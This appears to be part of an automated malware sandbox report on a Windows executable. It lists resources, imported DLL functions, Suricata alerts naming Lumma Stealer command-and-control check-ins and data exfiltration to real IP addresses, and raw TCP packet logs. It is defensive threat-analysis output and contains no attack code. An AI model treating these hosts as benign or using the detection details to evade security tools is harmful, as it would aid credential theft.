                                                                                                                                                    RT_BITMAP0x26dbe00x6c28Device independent bitmap graphic, 288 x 24 x 32, image size 27648, resolution 2835 x 2835 px/mEnglishUnited States0.05226090725223924
                                                                                                                                                    RT_BITMAP0x2759f80x628Device independent bitmap graphic, 32 x 12 x 32, image size 1536, resolution 226743 x 226743 px/mEnglishUnited States0.11294416243654823
                                                                                                                                                    RT_BITMAP0x2748080x828Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 18898 x 18898 px/mEnglishUnited States0.09434865900383142
                                                                                                                                                    RT_BITMAP0x268d380x4a8Device independent bitmap graphic, 24 x 12 x 32, image size 1152, resolution 18142 x 18142 px/mEnglishUnited States0.1610738255033557
                                                                                                                                                    RT_BITMAP0x2603c00x3028Device independent bitmap graphic, 96 x 32 x 32, image size 12288, resolution 3309 x 3309 px/mEnglishUnited States0.06878650227125244
                                                                                                                                                    RT_BITMAP0x26da080x1d8Device independent bitmap graphic, 12 x 12 x 24, image size 432EnglishUnited States0.13347457627118645
                                                                                                                                                    RT_BITMAP0x2633e80x828Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 91169 x 91169 px/mEnglishUnited States0.15373563218390804
                                                                                                                                                    RT_BITMAP0x276c480x2c8Device independent bitmap graphic, 12 x 14 x 32, image size 672, resolution 18142 x 18142 px/mEnglishUnited States0.0800561797752809
                                                                                                                                                    RT_BITMAP0x276f100x1f8Device independent bitmap graphic, 80 x 10 x 4, image size 400EnglishUnited States0.31547619047619047
                                                                                                                                                    RT_BITMAP0x2771f00x9c8Device independent bitmap graphic, 28 x 22 x 32, image size 2464, resolution 2835 x 2835 px/mEnglishUnited States0.04033546325878594
                                                                                                                                                    RT_BITMAP0x28d4a80x1228Device independent bitmap graphic, 48 x 24 x 32, image size 4608, resolution 2835 x 2835 px/mEnglishUnited States0.08067986230636832
                                                                                                                                                    RT_BITMAP0x2760200xc28Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 3309 x 3309 px/mEnglishUnited States0.17898457583547558
                                                                                                                                                    RT_BITMAP0x277bb80x3b8Device independent bitmap graphic, 12 x 19 x 32, image size 912, resolution 2835 x 2835 px/mEnglishUnited States0.13130252100840337
                                                                                                                                                    RT_BITMAP0x277f700x2b48Device independent bitmap graphic, 120 x 23 x 32, image size 11040, resolution 2835 x 2835 px/mEnglishUnited States0.032310469314079424
                                                                                                                                                    RT_BITMAP0x27aab80xc28Device independent bitmap graphic, 32 x 32 x 24, image size 3072EnglishUnited States0.046593830334190234
                                                                                                                                                    RT_BITMAP0x27b6e00x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.03667820069204152
                                                                                                                                                    RT_BITMAP0x27e4080x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.01591695501730104
                                                                                                                                                    RT_BITMAP0x2811300x628Device independent bitmap graphic, 32 x 16 x 24, image size 1536, resolution 2835 x 2835 px/mEnglishUnited States0.15545685279187818
                                                                                                                                                    RT_BITMAP0x2817580x5128Device independent bitmap graphic, 144 x 48 x 24, image size 20736, resolution 2835 x 2835 px/mEnglishUnited States0.03176742395071236
                                                                                                                                                    RT_BITMAP0x2868800x6c28Device independent bitmap graphic, 288 x 24 x 32, image size 27648, resolution 2835 x 2835 px/mEnglishUnited States0.034563709910430514
                                                                                                                                                    RT_BITMAP0x28e6d00x48Device independent bitmap graphic, 1 x 8 x 32, image size 32, resolution 2835 x 2835 px/mEnglishUnited States0.4166666666666667
                                                                                                                                                    RT_BITMAP0x28e7180xca8Device independent bitmap graphic, 80 x 10 x 32, image size 3200, resolution 2835 x 2835 px/mEnglishUnited States0.06419753086419754
                                                                                                                                                    RT_BITMAP0x28f3c00xc28Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 3309 x 3309 px/mEnglishUnited States0.17030848329048842
                                                                                                                                                    RT_BITMAP0x2998e80x5e4Device independent bitmap graphic, 70 x 39 x 4, image size 1404EnglishUnited States0.34615384615384615
                                                                                                                                                    RT_BITMAP0x299fb80xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                                                    RT_BITMAP0x29a0700x16cDevice independent bitmap graphic, 39 x 13 x 4, image size 260EnglishUnited States0.28296703296703296
                                                                                                                                                    RT_BITMAP0x29a1e00x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                                                    RT_ICON0x2509800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0547945205479452
                                                                                                                                                    RT_ICON0x254ba80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.0979253112033195
                                                                                                                                                    RT_ICON0x2571500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.10553470919324578
                                                                                                                                                    RT_ICON0x2581f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.22340425531914893
                                                                                                                                                    RT_ICON0x2586a00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0547945205479452
                                                                                                                                                    RT_ICON0x25c8c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.0979253112033195
                                                                                                                                                    RT_ICON0x25ee700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.10553470919324578
                                                                                                                                                    RT_ICON0x25ff180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.22340425531914893
                                                                                                                                                    RT_MENU0x2900180x4f4dataEnglishUnited States0.3383280757097792
                                                                                                                                                    RT_MENU0x2905100xa36dataEnglishUnited States0.2620504973221117
                                                                                                                                                    RT_DIALOG0x2914c00x2c8dataEnglishUnited States0.5196629213483146
                                                                                                                                                    RT_DIALOG0x2947c80x4d0dataEnglishUnited States0.4074675324675325
                                                                                                                                                    RT_DIALOG0x2923180x290dataEnglishUnited States0.46646341463414637
                                                                                                                                                    RT_DIALOG0x2911700x34edataEnglishUnited States0.45271867612293143
                                                                                                                                                    RT_DIALOG0x291d900x582dataEnglishUnited States0.4049645390070922
                                                                                                                                                    RT_DIALOG0x2931c00x30edataEnglishUnited States0.4833759590792839
                                                                                                                                                    RT_DIALOG0x2938580x394dataEnglishUnited States0.4585152838427948
                                                                                                                                                    RT_DIALOG0x2925a80x542dataEnglishUnited States0.38781575037147104
                                                                                                                                                    RT_DIALOG0x2918a80x4e6dataEnglishUnited States0.386762360446571
                                                                                                                                                    RT_DIALOG0x2936f80x160dataEnglishUnited States0.625
                                                                                                                                                    RT_DIALOG0x292af00x19edataEnglishUnited States0.5942028985507246
                                                                                                                                                    RT_DIALOG0x295e680x316dataEnglishUnited States0.49746835443037973
                                                                                                                                                    RT_DIALOG0x292c900x418dataEnglishUnited States0.40553435114503816
                                                                                                                                                    RT_DIALOG0x2934d00x222dataEnglishUnited States0.5842490842490843
                                                                                                                                                    RT_DIALOG0x2942a00x528dataEnglishUnited States0.4287878787878788
                                                                                                                                                    RT_DIALOG0x2917880x11adataEnglishUnited States0.6453900709219859
                                                                                                                                                    RT_DIALOG0x290f800x1eadataEnglishUnited States0.6122448979591837
                                                                                                                                                    RT_DIALOG0x2930a80x112dataEnglishUnited States0.6423357664233577
                                                                                                                                                    RT_DIALOG0x293bf00x336dataEnglishUnited States0.4781021897810219
                                                                                                                                                    RT_DIALOG0x293f280x184dataEnglishUnited States0.5438144329896907
                                                                                                                                                    RT_DIALOG0x2940b00x1eedataEnglishUnited States0.5323886639676113
                                                                                                                                                    RT_DIALOG0x294c980x5a6dataEnglishUnited States0.39557399723374825
                                                                                                                                                    RT_DIALOG0x2952400x54adataEnglishUnited States0.39807976366322007
                                                                                                                                                    RT_DIALOG0x2957900x362dataEnglishUnited States0.4457274826789838
                                                                                                                                                    RT_DIALOG0x295af80x36adataEnglishUnited States0.43592677345537756
                                                                                                                                                    RT_DIALOG0x2961800x598dataEnglishUnited States0.4155027932960894
                                                                                                                                                    RT_DIALOG0x2967180x238dataEnglishUnited States0.4841549295774648
                                                                                                                                                    RT_DIALOG0x2969500x102dataEnglishUnited States0.6550387596899225
                                                                                                                                                    RT_DIALOG0x296a580x130dataEnglishUnited States0.625
                                                                                                                                                    RT_DIALOG0x296b880x1eedataEnglishUnited States0.5263157894736842
                                                                                                                                                    RT_DIALOG0x296d780x184dataEnglishUnited States0.5438144329896907
                                                                                                                                                    RT_DIALOG0x296f000x238dataEnglishUnited States0.4841549295774648
                                                                                                                                                    RT_DIALOG0x2971380x4d0dataEnglishUnited States0.4074675324675325
                                                                                                                                                    RT_DIALOG0x2976080x598dataEnglishUnited States0.4155027932960894
                                                                                                                                                    RT_DIALOG0x297ba00x418dataEnglishUnited States0.40553435114503816
                                                                                                                                                    RT_DIALOG0x299ed00xe8dataEnglishUnited States0.6336206896551724
                                                                                                                                                    RT_STRING0x29a3280xeadataEnglishUnited States0.38461538461538464
                                                                                                                                                    RT_STRING0x29a7700x1d2dataEnglishUnited States0.3605150214592275
                                                                                                                                                    RT_STRING0x29af000x1badataEnglishUnited States0.38009049773755654
                                                                                                                                                    RT_STRING0x29b2600x150Matlab v4 mat-file (little endian) E, numeric, rows 0, columns 0EnglishUnited States0.40476190476190477
                                                                                                                                                    RT_STRING0x29b3b00x1d8dataEnglishUnited States0.4279661016949153
                                                                                                                                                    RT_STRING0x29b0c00x19adataEnglishUnited States0.4170731707317073
                                                                                                                                                    RT_STRING0x29ac380x2c8dataEnglishUnited States0.3061797752808989
                                                                                                                                                    RT_STRING0x29b5880x56Matlab v4 mat-file (little endian) d, numeric, rows 0, columns 0EnglishUnited States0.6511627906976745
                                                                                                                                                    RT_STRING0x29a9480x2ecdataEnglishUnited States0.3048128342245989
                                                                                                                                                    RT_STRING0x29b5e00x1fcdataEnglishUnited States0.24803149606299213
                                                                                                                                                    RT_STRING0x29a7400x2cLotus unknown worksheet or configuration, revision 0x25EnglishUnited States0.4772727272727273
                                                                                                                                                    RT_STRING0x29a4180x46dataEnglishUnited States0.6571428571428571
                                                                                                                                                    RT_STRING0x29a4600xd8dataEnglishUnited States0.5601851851851852
                                                                                                                                                    RT_STRING0x29a5380x78dataEnglishUnited States0.5916666666666667
                                                                                                                                                    RT_STRING0x29a5b00x124dataEnglishUnited States0.4246575342465753
                                                                                                                                                    RT_STRING0x29a6d80x62dataEnglishUnited States0.6530612244897959
                                                                                                                                                    RT_STRING0x29b7e00x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                                                    RT_STRING0x29b8680x2adataEnglishUnited States0.5476190476190477
                                                                                                                                                    RT_STRING0x29b8980x14adataEnglishUnited States0.5060606060606061
                                                                                                                                                    RT_STRING0x29b9e80x4e2dataEnglishUnited States0.376
                                                                                                                                                    RT_STRING0x29c2600x2a2dataEnglishUnited States0.28338278931750743
                                                                                                                                                    RT_STRING0x29bf800x2dcdataEnglishUnited States0.36885245901639346
                                                                                                                                                    RT_STRING0x29bed00xacdataEnglishUnited States0.45348837209302323
                                                                                                                                                    RT_STRING0x29cc380xdedataEnglishUnited States0.536036036036036
                                                                                                                                                    RT_STRING0x29c5080x4c4dataEnglishUnited States0.3221311475409836
                                                                                                                                                    RT_STRING0x29c9d00x264dataEnglishUnited States0.3741830065359477
                                                                                                                                                    RT_STRING0x29cd180x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                                    RT_ACCELERATOR0x290f480x38dataEnglishUnited States0.875
                                                                                                                                                    RT_GROUP_CURSOR0x2995680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                    RT_GROUP_CURSOR0x2996b80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                    RT_GROUP_CURSOR0x2992c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                    RT_GROUP_CURSOR0x2994180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                    RT_GROUP_CURSOR0x2998c00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                    RT_GROUP_ICON0x2586600x3edataEnglishUnited States0.8225806451612904
                                                                                                                                                    RT_GROUP_ICON0x2603800x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                    RT_VERSION0x297fb80x37cdataEnglishUnited States0.4439461883408072
                                                                                                                                                    RT_MANIFEST0x298fa80x1e7XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5503080082135524
                                                                                                                                                    None0x2987380x200dataEnglishUnited States0.482421875
                                                                                                                                                    None0x298b380x6adataEnglishUnited States0.7358490566037735
                                                                                                                                                    None0x2985380x200dataEnglishUnited States0.482421875
                                                                                                                                                    None0x2983380x200dataEnglishUnited States0.482421875
                                                                                                                                                    None0x2989380x200dataEnglishUnited States0.482421875
                                                                                                                                                    None0x298ba80x200dataEnglishUnited States0.482421875
                                                                                                                                                    None0x298da80x200dataEnglishUnited States0.482421875
                                                                                                                                                    None0x28ffe80x20dataEnglishUnited States1.1875
                                                                                                                                                    None0x2900080xadataEnglishUnited States1.6

                                                                                                                                                    Imports

                                                                                                                                                    DLLImport
                                                                                                                                                    KERNEL32.dllGetTimeZoneInformation, GetSystemTime, GetLocalTime, CreateThread, ExitThread, HeapSize, SetStdHandle, GetFileType, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetEnvironmentStrings, GetCommandLineW, GetCommandLineA, SetHandleCount, GetStdHandle, GetStartupInfoA, GetModuleFileNameA, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, CompareStringA, CompareStringW, SetUnhandledExceptionFilter, GetCurrentDirectoryA, LCMapStringA, LCMapStringW, IsBadReadPtr, IsBadCodePtr, GetCPInfo, IsValidLocale, IsValidCodePage, GetLocaleInfoA, EnumSystemLocalesA, GetUserDefaultLCID, GetStringTypeA, HeapReAlloc, GetDriveTypeA, GetLocaleInfoW, GetACP, GetOEMCP, SetEnvironmentVariableA, GetLastError, CreateMutexW, lstrcmpW, FreeLibrary, GetProcAddress, LoadLibraryW, GetModuleHandleW, lstrcpynW, GetVersionExW, lstrlenW, Sleep, GlobalUnlock, GlobalLock, GlobalAlloc, DeleteFileW, MoveFileW, CopyFileW, LocalFree, FormatMessageW, GetShortPathNameW, GetFileAttributesExW, CreateDirectoryW, GetTempPathW, GetCurrentProcess, GetPrivateProfileStringW, CloseHandle, GetExitCodeProcess, WaitForSingleObject, CreateProcessW, TerminateProcess, FreeConsole, InterlockedExchange, GetProfileStringA, GlobalAddAtomA, FindResourceA, GetDriveTypeW, RaiseException, HeapAlloc, HeapFree, RtlUnwind, ExitProcess, GetStartupInfoW, SetErrorMode, FindResourceExW, GetCurrentDirectoryW, SystemTimeToFileTime, LocalFileTimeToFileTime, FindNextFileW, GetProfileIntW, GetThreadLocale, GetStringTypeExW, GetVolumeInformationW, FindFirstFileW, FindClose, UnlockFile, LockFile, DuplicateHandle, TlsGetValue, LocalReAlloc, TlsSetValue, GlobalReAlloc, TlsFree, GlobalHandle, TlsAlloc, LocalAlloc, GetProcessVersion, GlobalFlags, lstrcmpiW, FileTimeToLocalFileTime, FileTimeToSystemTime, lstrcmpA, lstrcmpiA, GetCurrentThread, GlobalGetAtomNameW, CreateEventW, SuspendThread, SetEvent, LoadLibraryA, FindResourceW, GetVersion, lstrcatW, GetCurrentThreadId, GlobalAddAtomW, GlobalFindAtomW, GlobalDeleteAtom, lstrcpyW, GetDiskFreeSpaceW, GetFileTime, SetFileTime, GetFullPathNameW, GetTempFileNameW, GetFileAttributesW, lstrlenA, InterlockedDecrement, InterlockedIncrement, MulDiv, GetModuleHandleA, SetLastError, SetFilePointer, SizeofResource, LoadResource, GenerateConsoleCtrlEvent, LockResource, GlobalSize, GetFileSize, SetCurrentDirectoryW, GlobalFree, FlushFileBuffers, WriteFile, ReadFile, SetFilePointerEx, SetEndOfFile, GetFileSizeEx, CreateFileW, AreFileApisANSI, SetFileAttributesW, WritePrivateProfileStringW, GetPrivateProfileIntW, GetWindowsDirectoryW, GetTickCount, GetModuleFileNameW, MultiByteToWideChar, WideCharToMultiByte, ResumeThread, TerminateThread, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, DeleteCriticalSection, SetThreadPriority, AttachConsole, GetStringTypeW
                                                                                                                                                    USER32.dllSetRectEmpty, wvsprintfW, EndDialog, CreateDialogIndirectParamW, GetActiveWindow, ValidateRect, WindowFromPoint, ShowWindow, MoveWindow, SetWindowTextW, IsDialogMessageW, IsDlgButtonChecked, SetDlgItemTextW, SetDlgItemInt, GetDlgItemInt, CheckDlgButton, SendDlgItemMessageW, SendDlgItemMessageA, MapWindowPoints, PeekMessageW, SetActiveWindow, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetTopWindow, IsChild, WinHelpW, GetClassInfoW, RegisterClassW, TrackPopupMenu, GetDlgItem, GetWindowTextLengthW, GetWindowTextW, DestroyWindow, SetWindowsHookExW, CallNextHookEx, CallWindowProcW, DefWindowProcW, GetMessageTime, GetMessagePos, GetForegroundWindow, IntersectRect, SystemParametersInfoW, GetWindowPlacement, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuW, SetMenuItemBitmaps, EnableMenuItem, GetNextDlgTabItem, wsprintfW, UnhookWindowsHookEx, EndPaint, BeginPaint, GetWindowDC, MessageBoxW, LoadAcceleratorsW, SetPropW, SetClassLongW, SetMenu, HideCaret, ShowCaret, ExcludeUpdateRgn, GetWindowTextA, DrawTextA, GetClassInfoA, DefDlgProcA, DefWindowProcA, DestroyMenu, GetMessageW, TranslateMessage, DispatchMessageW, GetMenuStringW, FindWindowW, ExitWindowsEx, EmptyClipboard, SetClipboardData, GetClipboardData, CloseClipboard, OpenClipboard, DrawFocusRect, ReleaseDC, KillTimer, SetTimer, ScreenToClient, TranslateAcceleratorW, ReuseDDElParam, UnpackDDElParam, BringWindowToTop, IsZoomed, PostQuitMessage, ShowOwnedPopups, RegisterClipboardFormatW, GetAsyncKeyState, MapDialogRect, SetRect, LoadStringW, GetClassNameW, GetSysColorBrush, CharUpperW, IsWindowEnabled, SetFocus, RegisterWindowMessageW, GetDlgCtrlID, SetWindowPos, GetMenu, GetMenuItemCount, GetMenuItemID, GetWindowLongW, SetWindowLongW, DeleteMenu, GetKeyState, OffsetRect, InflateRect, GetSysColor, GetFocus, BeginDeferWindowPos, EndDeferWindowPos, GetCursorPos, ReleaseCapture, GetCapture, ClientToScreen, SetCursorPos, PtInRect, SetCursor, CharNextA, CallWindowProcA, RemovePropA, SetWindowsHookExA, GetWindowLongA, SendMessageA, IsWindowUnicode, GetClassNameA, SetWindowLongA, SetPropA, GetPropA, SetCapture, GrayStringW, DrawTextW, TabbedTextOutW, IsClipboardFormatAvailable, PostThreadMessageW, SetParent, LockWindowUpdate, RemovePropW, GetDCEx, GetParent, GetDesktopWindow, GetWindow, GetPropW, IsIconic, GetLastActivePopup, UpdateWindow, TrackPopupMenuEx, InvalidateRect, IsWindowVisible, GetSystemMenu, InsertMenuW, CheckMenuItem, DestroyIcon, LoadIconW, LoadImageW, GetDC, CopyRect, GetWindowRect, PostMessageW, IsWindow, LoadMenuW, GetClientRect, GetSubMenu, SetMenuDefaultItem, GetSystemMetrics, SendMessageW, SetForegroundWindow, EnableWindow, DestroyCursor, LoadBitmapW, LoadCursorW, GetWindowTextLengthA, UnregisterClassW, CreateWindowExW
                                                                                                                                                    GDI32.dllSetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, ExcludeClipRect, IntersectClipRect, GetDeviceCaps, CreateSolidBrush, CreatePatternBrush, SetRectRgn, GetCharWidthW, CreateFontW, GetTextMetricsW, EnumFontFamiliesExW, CopyMetaFileW, CreateRectRgn, CombineRgn, SetTextColor, SetBkMode, SetBkColor, SaveDC, GetClipBox, CreateRectRgnIndirect, ExtSelectClipRgn, SetStretchBltMode, StretchDIBits, SetDIBitsToDevice, RestoreDC, CreateDIBSection, DeleteDC, PatBlt, DeleteObject, SelectObject, GetBkMode, GetTextExtentPoint32W, GetBkColor, GetTextColor, BitBlt, Escape, ExtTextOutW, TextOutW, RectVisible, PtVisible, CreateCompatibleBitmap, CreateCompatibleDC, CreateBitmap, GetStockObject, GetObjectW, ExtTextOutA, GetTextExtentPointA, CreateDIBitmap, CreateFontIndirectW
                                                                                                                                                    comdlg32.dllGetFileTitleW, GetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                    WINSPOOL.DRVOpenPrinterW, DocumentPropertiesW, ClosePrinter
                                                                                                                                                    ADVAPI32.dllRegQueryValueW, RegSetValueExW, RegCreateKeyW, RegSetValueW, RegDeleteKeyW, RegEnumKeyW, RegOpenKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegDeleteValueW, SetFileSecurityW, GetFileSecurityW, RegCloseKey
                                                                                                                                                    SHELL32.dllDragAcceptFiles, ShellExecuteW, DragQueryFileW, SHGetSpecialFolderPathW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetMalloc, SHGetDesktopFolder, SHFileOperationW, ExtractIconW, SHGetFileInfoW, DragFinish
                                                                                                                                                    COMCTL32.dllImageList_DragLeave, ImageList_DragEnter, ImageList_BeginDrag, ImageList_DragMove, ImageList_GetImageInfo, ImageList_Draw, ImageList_AddMasked, ImageList_EndDrag, _TrackMouseEvent, ImageList_SetBkColor, ImageList_Destroy, ImageList_Create, PropertySheetW, DestroyPropertySheetPage, CreatePropertySheetPageW, ImageList_DrawIndirect, ImageList_GetImageCount
                                                                                                                                                    oledlg.dllOleUIBusyW
                                                                                                                                                    ole32.dllCoTaskMemAlloc, RevokeDragDrop, OleDuplicateData, RegisterDragDrop, OleGetClipboard, ReleaseStgMedium, CoFreeUnusedLibraries, OleUninitialize, OleInitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoCreateGuid, OleIsCurrentClipboard, CoRegisterMessageFilter, CoRevokeClassObject, CoLockObjectExternal, OleFlushClipboard
                                                                                                                                                    OLEAUT32.dllSysFreeString, SysAllocString, VariantClear, VarBstrFromDate
                                                                                                                                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                                                    SHLWAPI.dllPathGetCharTypeW, PathIsRootW, PathRemoveFileSpecW, PathIsURLW, PathFindExtensionW, PathFileExistsW, PathIsDirectoryW, PathFindFileNameW
                                                                                                                                                    WINHTTP.dllWinHttpOpenRequest, WinHttpCrackUrl, WinHttpAddRequestHeaders, WinHttpReadData, WinHttpCloseHandle, WinHttpSendRequest, WinHttpSetOption, WinHttpQueryOption, WinHttpQueryHeaders, WinHttpOpen, WinHttpConnect, WinHttpReceiveResponse

                                                                                                                                                    Possible Origin

                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                    EnglishUnited States

                                                                                                                                                    Network Behavior

                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                    2025-01-05T17:54:15.384083+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:15.895405+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449748104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:15.895405+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449748104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:16.406362+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:16.894231+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449749104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:16.894231+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449749104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:18.182604+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:19.620755+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449752104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:20.186521+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449752104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:21.248372+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449753104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:24.192636+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449754104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:25.189162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449755104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:27.191854+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449756104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:27.196515+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449756104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:29.571028+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449757104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:30.024044+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449757104.21.90.109443TCP
                                                                                                                                                    2025-01-05T17:54:30.792272+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449758185.161.251.21443TCP

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 5, 2025 17:54:14.893980026 CET49748443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:14.894033909 CET44349748104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:14.894123077 CET49748443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:14.919873953 CET49748443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:14.919894934 CET44349748104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:15.383903980 CET44349748104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:15.384083033 CET49748443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:15.389684916 CET49748443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:15.389700890 CET44349748104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:15.390027046 CET44349748104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:15.435501099 CET49748443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:15.476110935 CET49748443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:15.476111889 CET49748443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:15.476351023 CET44349748104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:15.895081997 CET44349748104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:15.895226002 CET44349748104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:15.895292044 CET49748443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:15.915968895 CET49748443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:15.915998936 CET44349748104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:15.916014910 CET49748443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:15.916022062 CET44349748104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:15.937647104 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:15.937704086 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:15.937935114 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:15.938072920 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:15.938087940 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.406158924 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.406362057 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.407670021 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.407676935 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.407892942 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.409280062 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.409303904 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.409332991 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.894191027 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.894542933 CET44349749104.21.90.109192.168.2.4
